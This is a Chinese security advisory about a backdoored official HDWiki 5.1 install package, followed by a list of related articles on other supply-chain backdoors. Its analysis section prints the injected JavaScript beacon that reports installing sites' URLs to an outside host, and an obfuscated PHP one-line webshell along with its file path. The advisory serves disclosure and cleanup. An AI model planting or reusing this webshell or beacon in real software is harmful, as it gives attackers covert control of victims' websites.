预警:HDWiki官方下载包被植入后门

  9月20日消息,今日安全联盟站长平台(zhanzhang.anquan.org)接到漏洞修复专家反馈信息称HDWiki百科建站系统“HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被植入恶意网站木马(后门)文件。安全联盟研究人员立即确认并分析了该“木马后门”,初步推断官方网站被黑客入侵后,在最新HDwiki的下载安装包里植入了恶意网站木马文件,当站长用户下载安装后,会把该网站木马文件直接带入到站长的网站上,然后黑客可通过该该网站木马完全控制站长用户的网站系统,使网站沦为“肉鸡”。目前安全联盟站长平台已积极联系HDwiki官方,并发布紧急预警,目前请站长朋友们暂停下载安装HDWiki百科建站系统,对近期下载安装过HDwiki的朋友,百度加速乐(jiasule.baidu.com)联合安全联盟站长平台提供独家解决方案。

  后门文件分析

  经过我们分析,在HDWiki安装文件包里的文件做了如下修改:

  一、在文件/hdwiki/install/install.php里 83-84行加入了如下代码:

  if( !window.x){ (function(){(new Image()).src='http://kaiyuan.hudong.com/count2/install.php?location='+ escape((function(){try{return document.location.href}catch(e){return ''}})());})();

  二、增加一个php文件,也就是我们的木马文件,位置在/hdwiki/js/jqeditor/skins/bg/index.php 代码如下:

  < ?php /* [UCenter] (C)2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $Id: client.php 913 2009-01-12 03:48:34Z zhaoxiongfei $ */ $a=range(1,200);$b=chr($a[96]).chr($a[114 ]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]). chr($a[83])}[马赛克]); ?>

  代码经过了编码加密,我们解密后确认该代码就是一个恶意的网站木马文件(编码加密过的“一句话木马”)。

  那么第一个文件里插入的js代码应该是为了收集“中招”了的网站地址,值得注意的是攻击者直接使用了官方的网站地址来收集这些信息。同时我们也注意到这个手法和以前的后门事件是非常相似的。

  历史上的“HDwiki后门事件”

  就在今年5月7日,HDwiki官方安装下载文件包里曾经也被植入了恶意的网站木马后门。

  详细见:http://bbs.jiasule.com/thread-3342-1-1.html

  解决方案

  查看您的网站是否存在文件 /hdwiki/js/jqeditor/skins/bg/index.php 如果存在直接删除。另外我们也更新了“HDWiki后面检测程序”(http://www.scanv.com/tools/ ),输入网址即可自动诊断。

时间: 2025-01-29 17:37:23

预警:HDWiki官方下载包被植入后门的相关文章

安全预警:Xshell 5官方版本被植入后门,更新即中招(国内已有用户受影响)

本文讲的是安全预警:Xshell 5官方版本被植入后门,更新即中招(国内已有用户受影响), 被植入后门的Xshell版本 嘶吼8月14日消息,知名服务器终端管理软件Xshell在7月18日发布的5.0 Build 1322官方版本被植入后门,用户下载.更新到该版本均会中招.嘶吼编辑打听了一圈,身边有多位朋友受到影响,危害正在评估中,或可能窃取用户设备信息. Xshell是一款功能强大的服务器终端管理软件,支持SSH1.SSH2.TELNET等协议,由国外公司NetSarang开发,在运维.站长.

开发者论坛一周精粹(第十九期) :【重要事件】运维人员注意啦:NetSarang的Xmanager和Xshell多种产品被植入后门

第十九期(2017年8月14日-2017年8月20日 ) 安全公司发现官方发布的软件版本中,nssock2.dll模块源码被植入后门.由于使用该软件的技术人员较多,存在一定的安全风险. 目前官方已经发布了xshell最高版本为 Xshell 5 Build 1326 ,该版本更新于2017年8月5日,建议尽快全盘查杀病毒并升级到最新版本.  [重要事件]运维人员注意啦:NetSarang的Xmanager和Xshell多种产品被植入后门  https://bbs.aliyun.com/read/

游戏安全资讯精选 2017年 第八期:从“马甲”到“刷金”,盘点网络游戏的攻击和欺诈,微软“9月周二补丁日”发布81个漏洞补丁,系统优化工具CCleaner被植入后门

  [每周游戏行业DDoS态势]     [游戏安全动态] 从"马甲"到"刷金",盘点网络游戏的攻击和欺诈.点击查看原文     概要:对网络游戏的攻击有两大目的,除了暴利之外,黑客的曝光和名声也是驱动因素.对网络游戏攻击的常见方式有:虚假注册(Phantom Registrations)."马甲攻击"(Sock Puppet):论坛或社区用户通过"马甲"假装成另外一个人参与有关自己及自己作品的讨论或者评论:大规模钓鱼攻击:木

cncert网络安全周报35期 境内被植入后门的政府网站112个 环比上涨24.4%

国际互联网应急中心发布了2016年总第35期的网络安全信息与动态周报,周报显示本周网络安全基本态势 良, CNCERT 协调国内各单位以及国际合作组织共处理了网络安全事件 749 起,其中跨境网络安全事件 226起. 本周境内感染网络病毒的主机数量约为62.1万个,其中包括境内被木马或被僵尸程序控制的主机约41.9万以及境内感染飞客(conficker)蠕虫的主机约20.2万. 本周CNCERT监测发现境内被篡改网站数量为3217个:境内被植入后门的网站数量为2596个:针对境内网站的仿冒页面数

NetSarang的Xmanager和Xshell多种产品被植入后门 绿盟科技发布分析与防护方案

NetSarang的Xmanager和Xshell等远程连接产品在日常安全运维中使用量不小,但不幸的是,近日安全公司发现官方发布的软件版本中,nssock2.dll模块源码被植入后门.绿盟科技发布技术分析与防护方案,报告全文如下 netsarang软件中的nssock2.dll模块被植入恶意代码的技术分析与防护方案 NetSarang是一家提供安全连接解决方案的公司,该公司的产品主要包括Xmanager, Xmanager 3D, Xshell, Xftp 和Xlpd.最近,官方在2017年7月

运维人员注意啦:NetSarang的Xmanager和Xshell多种产品被植入后门

Xshell是一款强大.著名的终端模拟软件,被广泛的用于服务器运维和管理,Xshell支持SSH,SFTP,TELNET,RLOGIN和SERIAL功能.它提供业界领先的性能和强大功能,在免费终端模拟软件中有着不可替代的地位.企业版中拥有更专业的功能其中包括:标签式的环境.动态端口转发.自定义键映射.用户定义按钮.VB脚本和用于显示2 byte字符和支持国际语言的UNICODE终端. Xshell提供许多用户友好的,在其他终端终端模拟软件没有的功能.这些功能包括:通过拖放文件进行Zmodem文件

知名Mac软件被黑植入后门,连累更新用户代码被窃、惨遭勒索

本文讲的是知名Mac软件被黑植入后门,连累更新用户代码被窃.惨遭勒索,编者按:本文来自Panic公司(开发 Mac 和 iOS 软件)官方博客,为其联合创始人Steven Frank的亲身经历,该公司有一款大受好评的游戏叫<Firewatch(看火人)>. 上周,开源视频转码软件HandBrake向用户发出警告,称其Mac版软件的镜像下载服务器遭到黑客入侵,软件被植入后门,允许攻击者远程控制受害者的计算机. 但就在一万种不可能的情况下,倒霉的我恰好在HandBrake遭到入侵的三天内手动更新了

PHP开源网站管理系统织梦CMS被发现植入后门

国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库.据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业.政府机关.媒体机构.行业及个人网站等.瑞星公司特此紧急提醒使用该系统的网站管理员,使用瑞星网站密码安全检测系统查找后门并及时进行封堵. 据瑞星专家介绍,织梦CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后门代码

ourceForge被入侵 phpMyadmin被植入后门

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 2012年9月25日消息,今天微博爆出消息,国外知名下载网站SourceForge韩国CDN节点疑似被入侵,热门下载资源phpMyadmin被植入后门. SourceForge. net是世界上最大的开源软件开发网站.很多国外非常有用的资源都可以从上面下载.而由于国内目前暂无SourceForge的CDN节点,导致从国内访问下载均是从韩国节点